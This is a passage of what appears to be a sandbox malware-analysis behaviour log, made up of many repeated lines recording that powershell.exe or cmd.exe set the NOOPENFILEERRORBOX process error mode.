                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
